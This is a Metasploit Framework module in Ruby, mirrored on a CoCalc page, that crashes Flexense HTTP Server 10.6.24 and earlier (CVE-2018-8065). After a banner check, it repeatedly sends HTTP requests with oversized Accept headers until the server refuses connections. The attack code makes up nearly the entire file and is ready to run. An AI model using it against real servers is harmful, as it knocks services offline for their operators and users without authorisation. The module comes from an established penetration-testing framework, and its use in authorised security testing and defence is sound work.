CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/flexense_http_server_dos.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Msf::Exploit::Remote::Tcp

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Flexense HTTP Server Denial Of Service',

13
      'Description'    => %q{

14
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.

15
        Vulnerability caused by a user mode write access memory violation and can be triggered with

16
        rapidly sending variety of HTTP requests with long HTTP header values.

17


18
        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.

19
      },

20
      'Author' 		=> [ 'Ege Balci <[email protected]>' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2018-8065'],

25
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],

26
        ],

27
      'DisclosureDate' => '2018-03-09'))

28


29
    register_options(

30
      [

31
        Opt::RPORT(80),

32
        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),

33
        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])

34
      ])

35


36
  end

37


38
  def check

39
    begin

40
      connect

41
      sock.put("GET / HTTP/1.0\r\n\r\n")

42
      res = sock.get

43
      if res and res.include? 'Flexense HTTP Server v10.6.24'

44
        Exploit::CheckCode::Appears

45
      else

46
        Exploit::CheckCode::Safe

47
      end

48
    rescue Rex::ConnectionRefused

49
      print_error("Target refused the connection")

50
      Exploit::CheckCode::Unknown

51
    rescue

52
      print_error("Target did not respond to HTTP request")

53
      Exploit::CheckCode::Unknown

54
    end

55
  end

56


57
  def run

58
    unless check == Exploit::CheckCode::Appears

59
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')

60
    end

61


62
    size = datastore['PacketSize'].to_i

63
    print_status("Starting with packets of #{size}-byte strings")

64


65
    count = 0

66
    loop do

67
      payload = ""

68
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"

69
      payload << "Host: 127.0.0.1\r\n"

70
      payload << "Accept: "+('A' * size)+"\r\n"

71
      payload << "\r\n\r\n"

72
      begin

73
        connect

74
        sock.put(payload)

75
        disconnect

76
        count += 1

77
        break if count==datastore['PacketCount']

78
      rescue ::Rex::InvalidDestination

79
        print_error('Invalid destination!  Continuing...')

80
      rescue ::Rex::ConnectionTimeout

81
        print_error('Connection timeout!  Continuing...')

82
      rescue ::Errno::ECONNRESET

83
        print_error('Connection reset!  Continuing...')

84
      rescue ::Rex::ConnectionRefused

85
        print_good("DoS successful after #{count} packets with #{size}-byte headers")

86
        return true

87
      end

88
    end

89
    print_error("DoS failed after #{count} packets of #{size}-byte strings")

90
  end

91
end

92


93